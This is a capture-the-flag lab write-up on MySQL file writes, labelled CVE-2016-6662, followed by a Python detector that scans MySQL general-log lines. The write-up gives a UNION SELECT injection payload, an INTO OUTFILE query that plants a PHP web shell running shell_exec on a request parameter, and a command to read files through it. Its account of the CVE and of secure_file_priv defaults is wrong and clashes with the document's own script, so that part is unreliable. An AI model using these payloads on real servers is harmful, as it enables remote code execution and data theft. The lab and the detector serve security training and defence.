## About this lab

This lab is dedicated to learning penetration testing skills through *CVE-2016-6662: MySQL Remote Root Code Execution*.
### Core logic:
The problem exploited in this lab lies in the `secure_file_priv` variable, which was added in MySQL version 5.5.53.
It was supposed to add a layer of security, since it restricts the server's ability to read or write files anywhere on disk, which was common at the time.
However, in the early 5.6 releases up to version 5.7.6, the default value of `secure_file_priv` is null, so nothing changes unless the database administrator explicitly sets it.
### Writeup:
1. The first part of the flag is inside the database; you will get it with this payload: `1 UNION SELECT NULL, flag from flags`
2. The second part of the flag is located in the root folder of the server. You first create a PHP shell with this query:
```sql
select '<?php $output=shell_exec($_GET["cmd"]);
echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
```
This creates a PHP file whose `cmd` parameter takes a value from the request and passes it to `shell_exec()`, a PHP function that executes shell commands.
3. With that parameter you can read the file: `/shell.php?cmd=cat /flag.txt`.
4. You get the flag.
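From the defender's side, the two conditions the writeup relies on (an unrestricted `secure_file_priv` and an `INTO OUTFILE` that lands in the web root) are both visible in MySQL's own settings and general query log. The following Python script is an added example, not part of the lab: it classifies a `secure_file_priv` value and scans constructed general-log lines (the format is MySQL 5.7's, the statements are made up for this example) for file writes outside the allowed directory, PHP tags in written content, and appended `UNION SELECT` clauses.

```python
import os
import re

# Constructed sample lines in MySQL 5.7 general-log format
# (timestamp, thread id, command type, argument); not taken from the lab.
SAMPLE_LOG = """\
2016-09-12T10:00:01.000000Z\t    7 Query\tSELECT id, name FROM items WHERE id = 1
2016-09-12T10:00:02.000000Z\t    7 Query\tSELECT id, name FROM items WHERE id = 1 UNION SELECT NULL, flag from flags
2016-09-12T10:00:03.000000Z\t    7 Query\tselect '<?php ... ?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1
2016-09-12T10:00:04.000000Z\t    8 Query\tSELECT * FROM reports INTO OUTFILE '/var/lib/mysql-files/report.csv'
"""
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")
OUTFILE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)

def secure_file_priv_status(value):
    """Classify SHOW VARIABLES LIKE 'secure_file_priv': the literal NULL
    disables file import/export, an empty string leaves it unrestricted
    (the condition this lab relies on), a directory confines file I/O to it."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    return "unrestricted" if value.strip() == "" else "restricted"

def analyse_query(sql, allowed_dir=None):
    """Findings for one statement; allowed_dir is the secure_file_priv
    directory, or None when the server is unrestricted."""
    findings = []
    m = OUTFILE_RE.search(sql)
    if m:
        # normpath collapses '..' so a traversal cannot slip past the prefix check
        path = os.path.normpath(m.group(1))
        prefix = os.path.normpath(allowed_dir) + os.sep if allowed_dir else None
        if prefix is None or not path.startswith(prefix):
            findings.append(f"file write outside secure_file_priv: {path}")
        if "<?php" in sql.lower():
            findings.append("PHP tag inside written content (web shell pattern)")
    if UNION_RE.search(sql):
        findings.append("UNION SELECT in statement (injection pattern)")
    return findings

def scan_general_log(text, allowed_dir=None):
    """Return (thread id, finding) pairs for every Query entry in the log."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("cmd") == "Query":
            for finding in analyse_query(m.group("arg"), allowed_dir):
                alerts.append((m.group("thread"), finding))
    return alerts
```

Running `scan_general_log(SAMPLE_LOG, "/var/lib/mysql-files")` flags only thread 7: the appended `UNION SELECT`, the write to `/var/www/html/shell.php`, and the PHP tag in its content, while the export into the permitted directory on thread 8 stays quiet.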